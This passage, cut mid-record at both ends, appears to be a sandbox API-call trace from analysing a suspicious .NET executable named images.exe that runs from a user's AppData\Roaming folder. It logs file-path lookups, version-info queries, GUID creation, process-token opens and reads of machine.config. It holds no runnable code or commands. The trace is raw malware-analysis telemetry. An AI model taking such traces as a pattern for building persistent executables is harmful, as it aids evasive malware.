lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", lpFilePart=0x0) returned 0x3f [0177.843] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", nBufferLength=0x105, lpBuffer=0x52e878, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", lpFilePart=0x0) returned 0x3f [0177.847] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", nBufferLength=0x105, lpBuffer=0x52e8d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpFilePart=0x0) returned 0x38 [0177.847] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", nBufferLength=0x105, lpBuffer=0x52e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpFilePart=0x0) returned 0x38 [0177.848] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", nBufferLength=0x105, lpBuffer=0x52e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpFilePart=0x0) returned 0x38 [0177.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52ed04) returned 1 [0177.850] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe"), fInfoLevelId=0x0, lpFileInformation=0x52ed80 | out: lpFileInformation=0x52ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb627c790, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0xb627c790, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x127e2500, ftLastWriteTime.dwHighDateTime=0x1d6a090, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0177.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52ed00) returned 1 [0177.851] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpdwHandle=0x52edf4 | out: lpdwHandle=0x52edf4) returned 0x6ac [0177.852] GetFileVersionInfoW (in: lptstrFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", dwHandle=0x0, dwLen=0x6ac, lpData=0x2248f38 | out: lpData=0x2248f38) returned 1 [0177.853] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x52edc8, puLen=0x52edc4 | out: lplpBuffer=0x52edc8*=0x2248fd4, puLen=0x52edc4) returned 1 [0177.855] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x52ed48, puLen=0x52ed44 | out: lplpBuffer=0x52ed48*=0x2249074, puLen=0x52ed44) returned 1 [0177.856] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x52ed48, puLen=0x52ed44 | out: lplpBuffer=0x52ed48*=0x22490a4, puLen=0x52ed44) returned 1 [0177.856] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x52ed48, puLen=0x52ed44 | out: lplpBuffer=0x52ed48*=0x22490d8, puLen=0x52ed44) returned 1 [0177.856] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x52ed48, puLen=0x52ed44 | out: lplpBuffer=0x52ed48*=0x224910c, puLen=0x52ed44) returned 1 [0177.856] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x52ed48, puLen=0x52ed44 | out: lplpBuffer=0x52ed48*=0x2249140, puLen=0x52ed44) returned 1 [0177.856] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x52ed48, puLen=0x52ed44 | out: lplpBuffer=0x52ed48*=0x22491d4, puLen=0x52ed44) returned 1 [0177.856] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x52ed48, puLen=0x52ed44 | out: lplpBuffer=0x52ed48*=0x2249204, puLen=0x52ed44) returned 1 [0177.856] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x52ed48, puLen=0x52ed44 | out: lplpBuffer=0x52ed48*=0x224923c, puLen=0x52ed44) returned 1 [0177.856] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x52ed48, puLen=0x52ed44 | out: lplpBuffer=0x52ed48*=0x224902c, puLen=0x52ed44) returned 1 [0177.856] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x52ed48, puLen=0x52ed44 | out: lplpBuffer=0x52ed48*=0x224919c, puLen=0x52ed44) returned 1 [0177.856] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x52ed48, puLen=0x52ed44 | out: lplpBuffer=0x52ed48*=0x0, puLen=0x52ed44) returned 0 [0177.856] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x52ed48, puLen=0x52ed44 | out: lplpBuffer=0x52ed48*=0x0, puLen=0x52ed44) returned 0 [0177.856] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x52ed3c, puLen=0x52ed38 | out: lplpBuffer=0x52ed3c*=0x2248fd4, puLen=0x52ed38) returned 1 [0177.857] VerLanguageNameW (in: wLang=0x0, szLang=0x52eacc, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0177.858] VerQueryValueW (in: pBlock=0x2248f38, lpSubBlock="\\", lplpBuffer=0x52ed4c, puLen=0x52ed48 | out: lplpBuffer=0x52ed4c*=0x2248f60, puLen=0x52ed48) returned 1 [0177.969] CoTaskMemAlloc (cb=0x20c) returned 0x3a9f40 [0177.969] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x3a9f40 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0177.971] CoTaskMemFree (pv=0x3a9f40) [0177.971] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x52e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0177.972] CoTaskMemAlloc (cb=0x20c) returned 0x3a9f40 [0177.972] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x3a9f40 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0177.973] CoTaskMemFree (pv=0x3a9f40) [0177.973] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x52e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0177.979] CoCreateGuid (in: pguid=0x52e624 | out: pguid=0x52e624*(Data1=0x73955468, Data2=0x999b, Data3=0x434c, Data4=([0]=0x80, [1]=0x87, [2]=0xc8, [3]=0xc4, [4]=0x87, [5]=0x90, [6]=0xda, [7]=0x6c))) returned 0x0 [0177.980] CoCreateGuid (in: pguid=0x52e624 | out: pguid=0x52e624*(Data1=0x1ee3c1d3, Data2=0x237c, Data3=0x486c, Data4=([0]=0xa8, [1]=0xef, [2]=0xc, [3]=0x76, [4]=0x15, [5]=0x3e, [6]=0x23, [7]=0xd6))) returned 0x0 [0177.980] CoCreateGuid (in: pguid=0x52e624 | out: pguid=0x52e624*(Data1=0xee28363b, Data2=0x91ed, Data3=0x4df4, Data4=([0]=0x9e, [1]=0xac, [2]=0xe3, [3]=0xb5, [4]=0xbd, [5]=0x42, [6]=0xe9, [7]=0x7))) returned 0x0 [0177.980] CoCreateGuid (in: pguid=0x52e624 | out: pguid=0x52e624*(Data1=0xc3f967a3, Data2=0x9c62, Data3=0x4401, Data4=([0]=0xb2, [1]=0x77, [2]=0xf5, [3]=0xcb, [4]=0x41, [5]=0x1c, [6]=0xc5, [7]=0x3f))) returned 0x0 [0177.980] CoCreateGuid (in: pguid=0x52e624 | out: pguid=0x52e624*(Data1=0x30288af8, Data2=0x818d, Data3=0x4a37, Data4=([0]=0xa2, [1]=0x79, [2]=0x4c, [3]=0xd6, [4]=0xbc, [5]=0x4d, [6]=0x7, [7]=0x8f))) returned 0x0 [0177.980] CoCreateGuid (in: pguid=0x52e624 | out: pguid=0x52e624*(Data1=0x6af3685a, Data2=0xd727, Data3=0x456a, Data4=([0]=0xa8, [1]=0xa3, [2]=0x11, [3]=0x18, [4]=0x73, [5]=0x23, [6]=0xfa, [7]=0x8f))) returned 0x0 [0177.980] CoCreateGuid (in: pguid=0x52e624 | out: pguid=0x52e624*(Data1=0xbdbca057, Data2=0x590f, Data3=0x4569, Data4=([0]=0x99, [1]=0x6, [2]=0xd, [3]=0x77, [4]=0x53, [5]=0x82, [6]=0x5b, [7]=0x58))) returned 0x0 [0177.980] CoCreateGuid (in: pguid=0x52e624 | out: pguid=0x52e624*(Data1=0x97da6520, Data2=0x6bdd, Data3=0x4da5, Data4=([0]=0x80, [1]=0x4c, [2]=0xa7, [3]=0x8d, [4]=0xa9, [5]=0xd2, [6]=0xef, [7]=0x20))) returned 0x0 [0177.980] CoCreateGuid (in: pguid=0x52e624 | out: pguid=0x52e624*(Data1=0x7f65d341, Data2=0x8d4e, Data3=0x4b38, Data4=([0]=0xad, [1]=0x95, [2]=0x76, [3]=0x44, [4]=0x76, [5]=0x85, [6]=0x2c, [7]=0x5f))) returned 0x0 [0177.980] CoCreateGuid (in: pguid=0x52e624 | out: pguid=0x52e624*(Data1=0x92b28323, Data2=0x3ca3, Data3=0x4f2e, Data4=([0]=0xaf, [1]=0xd4, [2]=0x9f, [3]=0x77, [4]=0x12, [5]=0xf3, [6]=0x73, [7]=0x33))) returned 0x0 [0177.980] CoCreateGuid (in: pguid=0x52e624 | out: pguid=0x52e624*(Data1=0x4308a4d5, Data2=0x2be3, Data3=0x4565, Data4=([0]=0xb6, [1]=0x11, [2]=0x0, [3]=0xa2, [4]=0xe1, [5]=0x85, [6]=0x8d, [7]=0x23))) returned 0x0 [0177.980] CoCreateGuid (in: pguid=0x52e624 | out: pguid=0x52e624*(Data1=0xe76f1330, Data2=0x4b80, Data3=0x44c9, Data4=([0]=0xa7, [1]=0xc8, [2]=0x2, [3]=0xc9, [4]=0x40, [5]=0x93, [6]=0xed, [7]=0x3f))) returned 0x0 [0177.998] CoCreateGuid (in: pguid=0x52e748 | out: pguid=0x52e748*(Data1=0xfe44e015, Data2=0xd056, Data3=0x4d26, Data4=([0]=0xa3, [1]=0x88, [2]=0xaf, [3]=0x4c, [4]=0xa0, [5]=0x2, [6]=0x19, [7]=0x3e))) returned 0x0 [0177.998] CoCreateGuid (in: pguid=0x52e748 | out: pguid=0x52e748*(Data1=0x8d0be864, Data2=0xdfd8, Data3=0x4e44, Data4=([0]=0xad, [1]=0x38, [2]=0x8a, [3]=0x0, [4]=0x7, [5]=0x8a, [6]=0xbf, [7]=0xf2))) returned 0x0 [0177.998] CoCreateGuid (in: pguid=0x52e748 | out: pguid=0x52e748*(Data1=0xf5cf24a2, Data2=0x8952, Data3=0x4276, Data4=([0]=0xa1, [1]=0x6d, [2]=0x79, [3]=0xe8, [4]=0xf6, [5]=0xd9, [6]=0xe7, [7]=0x81))) returned 0x0 [0178.078] GetCurrentProcess () returned 0xffffffff [0178.079] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52eb9c | out: TokenHandle=0x52eb9c*=0x270) returned 1 [0178.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x52e67c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0178.083] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x52eb9c | out: lpFileInformation=0x52eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0178.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x52e648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0178.085] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x52eb9c | out: lpFileInformation=0x52eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0178.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x52e5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0178.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52eac8) returned 1 [0178.086] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x274 [0178.086] GetFileType (hFile=0x274) returned 0x1 [0178.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52eac4) returned 1 [0178.086] GetFileType (hFile=0x274) returned 0x1 [0178.094] GetFileSize (in: hFile=0x274, lpFileSizeHigh=0x52eb90 | out: lpFileSizeHigh=0x52eb90*=0x0) returned 0x8c8f [0178.094] ReadFile (in: hFile=0x274, lpBuffer=0x225e6bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52eb4c, lpOverlapped=0x0 | out: lpBuffer=0x225e6bc*, lpNumberOfBytesRead=0x52eb4c*=0x1000, lpOverlapped=0x0) returned 1 [0178.104] ReadFile (in: hFile=0x274, lpBuffer=0x225e6bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e9e8, lpOverlapped=0x0 | out: lpBuffer=0x225e6bc*, lpNumberOfBytesRead=0x52e9e8*=0x1000, lpOverlapped=0x0) returned 1 [0178.106] ReadFile (in: hFile=0x274, lpBuffer=0x225e6bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e89c, lpOverlapped=0x0 | out: lpBuffer=0x225e6bc*, lpNumberOfBytesRead=0x52e89c*=0x1000, lpOverlapped=0x0) returned 1 [0178.107] ReadFile (in: hFile=0x274, lpBuffer=0x225e6bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e89c, lpOverlapped=0x0 | out: lpBuffer=0x225e6bc*, lpNumberOfBytesRead=0x52e89c*=0x1000, lpOverlapped=0x0) returned 1 [0178.107] ReadFile (in: hFile=0x274, lpBuffer=0x225e6bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e89c, lpOverlapped=0x0 | out: lpBuffer=0x225e6bc*, lpNumberOfBytesRead=0x52e89c*=0x1000, lpOverlapped=0x0) returned 1 [0178.107] ReadFile (in: hFile=0x274, lpBuffer=0x225e6bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e7d4, lpOverlapped=0x0 | out: lpBuffer=0x225e6bc*, lpNumberOfBytesRead=0x52e7d4*=0x1000, lpOverlapped=0x0) returned 1 [0178.112] ReadFile (in: hFile=0x274, lpBuffer=0x225e6bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e950, lpOverlapped=0x0 | out: lpBuffer=0x225e6bc*, lpNumberOfBytesRead=0x52e950*=0x1000, lpOverlapped=0x0) returned 1 [0178.114] ReadFile (in: hFile=0x274, lpBuffer=0x225e6bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e864, lpOverlapped=0x0 | out: lpBuffer=0x225e6bc*, lpNumberOfBytesRead=0x52e864*=0x1000, lpOverlapped=0x0) returned 1 [0178.114] ReadFile (in: hFile=0x274, lpBuffer=0x225e6bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e864, lpOverlapped=0x0 | out: lpBuffer=0x225e6bc*, lpNumberOfBytesRead=0x52e864*=0xc8f, lpOverlapped=0x0) returned 1 [0178.114] ReadFile (in: hFile=0x274, lpBuffer=0x225e6bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e924, lpOverlapped=0x0 | out: lpBuffer=0x225e6bc*, lpNumberOfBytesRead=0x52e924*=0x0, lpOverlapped=0x0) returned 1 [0178.114] CloseHandle (hObject=0x274) returned 1 [0178.115] GetCurrentProcess () returned 0xffffffff [0178.115] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ecd0 | out: TokenHandle=0x52ecd0*=0x274) returned 1 [0178.115] GetCurrentProcess () returned 0xffffffff [0178.116] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ecd0 | out: TokenHandle=0x52ecd0*=0x268) returned 1 [0178.116] GetCurrentProcess () returned 0xffffffff [0178.116] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52eb9c | out: TokenHandle=0x52eb9c*=0x278) returned 1 [0178.116] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x52eb9c | out: lpFileInformation=0x52eb9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0178.117] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", nBufferLength=0x105, lpBuffer=0x52e648, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", lpFilePart=0x0) returned 0x3f [0178.117] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x52eb9c | out: lpFileInformation=0x52eb9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0178.117] GetCurrentProcess () returned 0xffffffff [0178.117] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ecd0 | out: TokenHandle=0x52ecd0*=0x27c) returned 1 [0178.118] GetCurrentProcess () returned 0xffffffff [0178.118] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ecd0 | out: TokenHandle=0x52ecd0*=0x280) returned 1 [0178.119] GetCurrentProcess () returned 0xffffffff [0178.119] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ecd4 | out: TokenHandle=0x52ecd4*=0x284) returned 1 [0178.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x52e780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0178.119] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x52ecd4 | out: lpFileInformation=0x52ecd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0178.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x52e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0178.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52ec00) returned 1 [0178.119] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0178.120] GetFileType (hFile=0x288) returned 0x1 [0178.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52ebfc) returned 1 [0178.120] GetFileType (hFile=0x288) returned 0x1 [0178.120] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x52ecc8 | out: lpFileSizeHigh=0x52ecc8*=0x0) returned 0x8c8f [0178.120] ReadFile (in: hFile=0x288, lpBuffer=0x22770e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52ec84, lpOverlapped=0x0 | out: lpBuffer=0x22770e0*, lpNumberOfBytesRead=0x52ec84*=0x1000, lpOverlapped=0x0) returned 1 [0178.120] ReadFile (in: hFile=0x288, lpBuffer=0x22770e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52eb20, lpOverlapped=0x0 | out: lpBuffer=0x22770e0*, lpNumberOfBytesRead=0x52eb20*=0x1000, lpOverlapped=0x0) returned 1 [0178.120] ReadFile (in: hFile=0x288, lpBuffer=0x22770e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e9d4, lpOverlapped=0x0 | out: lpBuffer=0x22770e0*, lpNumberOfBytesRead=0x52e9d4*=0x1000, lpOverlapped=0x0) returned 1 [0178.121] ReadFile (in: hFile=0x288, lpBuffer=0x22770e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e9d4, lpOverlapped=0x0 | out: lpBuffer=0x22770e0*, lpNumberOfBytesRead=0x52e9d4*=0x1000, lpOverlapped=0x0) returned 1 [0178.122] ReadFile (in: hFile=0x288, lpBuffer=0x22770e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e9d4, lpOverlapped=0x0 | out: lpBuffer=0x22770e0*, lpNumberOfBytesRead=0x52e9d4*=0x1000, lpOverlapped=0x0) returned 1 [0178.122] ReadFile (in: hFile=0x288, lpBuffer=0x22770e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e90c, lpOverlapped=0x0 | out: lpBuffer=0x22770e0*, lpNumberOfBytesRead=0x52e90c*=0x1000, lpOverlapped=0x0) returned 1 [0178.123] CloseHandle (hObject=0x288) returned 1 [0178.123] GetCurrentProcess () returned 0xffffffff [0178.123] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ec90 | out: TokenHandle=0x52ec90*=0x288) returned 1 [0178.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", nBufferLength=0x105, lpBuffer=0x52e73c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", lpFilePart=0x0) returned 0x3f [0178.123] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x52ec90 | out: lpFileInformation=0x52ec90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0178.123] GetCurrentProcess () returned 0xffffffff [0178.123] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ec4c | out: TokenHandle=0x52ec4c*=0x28c) returned 1 [0178.124] GetCurrentProcess () returned 0xffffffff [0178.124] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ec08 | out: TokenHandle=0x52ec08*=0x290) returned 1 [0178.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", nBufferLength=0x105, lpBuffer=0x52e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", lpFilePart=0x0) returned 0x3f [0178.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", nBufferLength=0x105, lpBuffer=0x52e768, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", lpFilePart=0x0) returned 0x3f [0178.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", nBufferLength=0x105, lpBuffer=0x52e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpFilePart=0x0) returned 0x38 [0178.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", nBufferLength=0x105, lpBuffer=0x52e73c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpFilePart=0x0) returned 0x38 [0178.125] GetFullPathNameW (in: 